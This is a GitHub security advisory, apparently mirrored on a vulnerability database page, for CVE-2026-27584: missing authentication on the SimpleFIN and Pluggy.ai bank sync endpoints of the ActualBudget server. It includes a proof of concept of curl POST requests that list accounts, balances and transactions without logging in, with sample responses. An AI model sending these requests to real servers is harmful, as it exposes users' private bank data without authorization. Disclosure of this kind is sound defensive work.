GHSA-M2CQ-XJGM-F668
Vulnerability from github – Published: 2026-02-24 20:13 – Updated: 2026-02-24 20:13
VLAI?
Summary
ActualBudget server is Missing Authentication for SimpleFIN and Pluggy AI bank sync endpoints
Details
Summary
Missing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information.
Impact
This vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network.
Details
The ActualBudget server component allows for integration with SimpleFIN and Pluggy.ai services. These services read bank account balances and transaction data from users' banks and return the data to ActualBudget. The affected endpoints facilitate this integration and are intended to be used only by logged in users for the purposes of syncing bank transaction data.
The vulnerable source code is in the following files in the actualbudget/actual GitHub repository (https://github.com/actualbudget/actual/):
* /packages/sync-server/src/app-simplefin/app-simplefin.js
* /packages/sync-server/src/app-pluggyai/app-pluggyai.js
The sensitive endpoints missing authentication are:
* POST /simplefin/status
* POST /simplefin/accounts
* POST /simplefin/transactions
* POST /pluggyai/status
* POST /pluggyai/accounts
* POST /pluggyai/transactions
The following source code is an example of an integration that implements the authentication middleware (packages/sync-server/src/app-gocardless/app-gocardless.js):
const app = express();
app.use(requestLoggerMiddleware);
...
app.use(express.json());
app.use(validateSessionMiddleware); // <-- Uses authentication
PoC
The below commands exploit this vulnerability on both the SimpleFIN and Pluggy.ai endpoints. No authentication is required. Network access is required.
SimpleFIN:
# Check if SimpleFIN is configured
curl -X POST "https://<actualbudgethost>/simplefin/status"
# List SimpleFIN accounts
curl -X POST "https://<actualbudgethost>/simplefin/accounts"
# List SimpleFIN transactions with an account ID from the previous request
curl -X POST "https://<actualbudgethost>/simplefin/transactions" -H "Content-Type: application/json" -d '{"accountId":["ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"],"startDate":["2026-02-01"]}'
PluggyAI:
# Check if PluggyAI is configured
curl -X POST "https://<actualbudgethost>/pluggyai/status"
# List Pluggy.ai accounts
curl -X POST "https://<actualbudgethost>/pluggyai/accounts"
# List Pluggy.ai transactions with an account ID from the previous request
curl -X POST "https://<actualbudgethost>/pluggyai/transactions" -H "Content-Type: application/json" -d '{"accountId":["ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX"],"startDate":["2026-02-01"]}'
Example response from POST /simplefin/accounts:
{
"status": "ok",
"data": {
"accounts": [
{
"id": "ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"name": "CHEQUING ACCOUNT",
"currency": "CAD",
"balance": "1234.56",
"available-balance": "0.00",
"balance-date": 1771531758,
"transactions": [],
"holdings": [],
"org": {
"domain": "www.cibc.com",
"name": "CIBC",
"sfin-url": "https://beta-bridge.simplefin.org/simplefin",
"url": "https://www.cibconline.cibc.com",
"id": "www.cibconline.cibc.com"
}
},
...
]
}
}
Example response from POST /simplefin/transactions:
{
"status": "ok",
"data": {
"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX": {
"balances": [
{
"balanceAmount": {
"amount": "1234.56",
"currency": "CAD"
},
"balanceType": "expected",
"referenceDate": "2026-02-19"
},
{
"balanceAmount": {
"amount": "1234.56",
"currency": "CAD"
},
"balanceType": "interimAvailable",
"referenceDate": "2026-02-19"
}
],
"startingBalance": 123456,
"transactions": {
"all": [
{
"booked": true,
"sortOrder": 1771502400,
"date": "2026-02-19",
"payeeName": "E-Transfer",
"notes": "SEND E-TFR ***ABC",
"transactionAmount": {
"amount": "-12.00",
"currency": "USD"
},
"transactionId": "TRN-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX",
"transactedDate": "2026-02-19",
"postedDate": "2026-02-19"
},
...
],
"pending": []
}
}
}
}
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "@actual-app/sync-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "26.2.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-27584"
],
"database_specific": {
"cwe_ids": [
"CWE-306"
],
"github_reviewed": true,
"github_reviewed_at": "2026-02-24T20:13:30Z",
"nvd_published_at": "2026-02-24T15:21:39Z",
"severity": "CRITICAL"
},
"details": "### Summary\n\nMissing authentication middleware in the ActualBudget server component allows any unauthenticated user to query the SimpleFIN and Pluggy.ai integration endpoints and read sensitive bank account balance and transaction information.\n\n### Impact\n\nThis vulnerability allows an unauthenticated attacker to read the bank account balance and transaction history of ActualBudget users. This vulnerability impacts all ActualBudget Server users with the SimpleFIN or Pluggy.ai integrations configured. The ActualBudget Server instance must be reachable over the network.\n\n### Details\n\nThe ActualBudget server component allows for integration with SimpleFIN and Pluggy.ai services. These services read bank account balances and transaction data from users\u0027 banks and return the data to ActualBudget. The affected endpoints facilitate this integration and are intended to be used only by logged in users for the purposes of syncing bank transaction data.\n\nThe vulnerable source code is in the following files in the `actualbudget/actual` GitHub repository (https://github.com/actualbudget/actual/):\n* `/packages/sync-server/src/app-simplefin/app-simplefin.js`\n* `/packages/sync-server/src/app-pluggyai/app-pluggyai.js`\n\nThe sensitive endpoints missing authentication are:\n* `POST /simplefin/status`\n* `POST /simplefin/accounts`\n* `POST /simplefin/transactions`\n* `POST /pluggyai/status`\n* `POST /pluggyai/accounts`\n* `POST /pluggyai/transactions`\n\nThe following source code is an example of an integration that implements the authentication middleware (`packages/sync-server/src/app-gocardless/app-gocardless.js`):\n```js\nconst app = express();\napp.use(requestLoggerMiddleware);\n...\napp.use(express.json());\napp.use(validateSessionMiddleware); // \u003c-- Uses authentication\n```\n\n\n### PoC\n\nThe below commands exploit this vulnerability on both the SimpleFIN and Pluggy.ai endpoints. No authentication is required. Network access is required.\n\nSimpleFIN:\n```bash\n# Check if SimpleFIN is configured\ncurl -X POST \"https://\u003cactualbudgethost\u003e/simplefin/status\"\n\n# List SimpleFIN accounts\ncurl -X POST \"https://\u003cactualbudgethost\u003e/simplefin/accounts\"\n\n# List SimpleFIN transactions with an account ID from the previous request\ncurl -X POST \"https://\u003cactualbudgethost\u003e/simplefin/transactions\" -H \"Content-Type: application/json\" -d \u0027{\"accountId\":[\"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\"],\"startDate\":[\"2026-02-01\"]}\u0027\n```\n\nPluggyAI:\n```bash\n# Check if PluggyAI is configured\ncurl -X POST \"https://\u003cactualbudgethost\u003e/pluggyai/status\"\n\n# List Pluggy.ai accounts\ncurl -X POST \"https://\u003cactualbudgethost\u003e/pluggyai/accounts\"\n\n# List Pluggy.ai transactions with an account ID from the previous request\ncurl -X POST \"https://\u003cactualbudgethost\u003e/pluggyai/transactions\" -H \"Content-Type: application/json\" -d \u0027{\"accountId\":[\"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\"],\"startDate\":[\"2026-02-01\"]}\u0027\n```\n\nExample response from `POST /simplefin/accounts`:\n```json\n{\n \"status\": \"ok\",\n \"data\": {\n \"accounts\": [\n {\n \"id\": \"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n \"name\": \"CHEQUING ACCOUNT\",\n \"currency\": \"CAD\",\n \"balance\": \"1234.56\",\n \"available-balance\": \"0.00\",\n \"balance-date\": 1771531758,\n \"transactions\": [],\n \"holdings\": [],\n \"org\": {\n \"domain\": \"www.cibc.com\",\n \"name\": \"CIBC\",\n \"sfin-url\": \"https://beta-bridge.simplefin.org/simplefin\",\n \"url\": \"https://www.cibconline.cibc.com\",\n \"id\": \"www.cibconline.cibc.com\"\n }\n },\n ...\n ]\n }\n}\n```\n\nExample response from `POST /simplefin/transactions`:\n```json\n{\n \"status\": \"ok\",\n \"data\": {\n \"ACT-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\": {\n \"balances\": [\n {\n \"balanceAmount\": {\n \"amount\": \"1234.56\",\n \"currency\": \"CAD\"\n },\n \"balanceType\": \"expected\",\n \"referenceDate\": \"2026-02-19\"\n },\n {\n \"balanceAmount\": {\n \"amount\": \"1234.56\",\n \"currency\": \"CAD\"\n },\n \"balanceType\": \"interimAvailable\",\n \"referenceDate\": \"2026-02-19\"\n }\n ],\n \"startingBalance\": 123456,\n \"transactions\": {\n \"all\": [\n {\n \"booked\": true,\n \"sortOrder\": 1771502400,\n \"date\": \"2026-02-19\",\n \"payeeName\": \"E-Transfer\",\n \"notes\": \"SEND E-TFR ***ABC\",\n \"transactionAmount\": {\n \"amount\": \"-12.00\",\n \"currency\": \"USD\"\n },\n \"transactionId\": \"TRN-XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\n \"transactedDate\": \"2026-02-19\",\n \"postedDate\": \"2026-02-19\"\n },\n ...\n ],\n \"pending\": []\n }\n }\n }\n}\n```",
"id": "GHSA-m2cq-xjgm-f668",
"modified": "2026-02-24T20:13:30Z",
"published": "2026-02-24T20:13:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/actualbudget/actual/security/advisories/GHSA-m2cq-xjgm-f668"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27584"
},
{
"type": "WEB",
"url": "https://github.com/actualbudget/actual/commit/ea937d100956ca56689ff852d99c28589e2a7d88"
},
{
"type": "PACKAGE",
"url": "https://github.com/actualbudget/actual"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "ActualBudget server is Missing Authentication for SimpleFIN and Pluggy AI bank sync endpoints"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…